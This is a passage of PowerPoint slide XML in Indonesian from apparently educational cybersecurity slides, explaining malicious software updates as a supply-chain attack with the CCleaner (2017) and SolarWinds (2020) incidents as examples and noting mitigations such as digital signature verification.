            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengklaim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbaiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur-fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semacam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terletak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menipu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempercayai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2017, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CCleaner yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirilis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jutaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengunduh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengira</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. https://arstechnica.com/information-technology/2017/09/ backdoor-malware-planted-in-legitimate-software-updates-to-ccleaner/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Kasus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SolarWinds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2020, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform SolarWinds Orion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belakang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. https://www.npr.org/2021/04/16/985439655/a-worst-nightmare- cyberattack-the-untold-story-of-the-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solarwinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-hack</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178</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206089093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Ruang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lingkup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Evaluasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cakupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
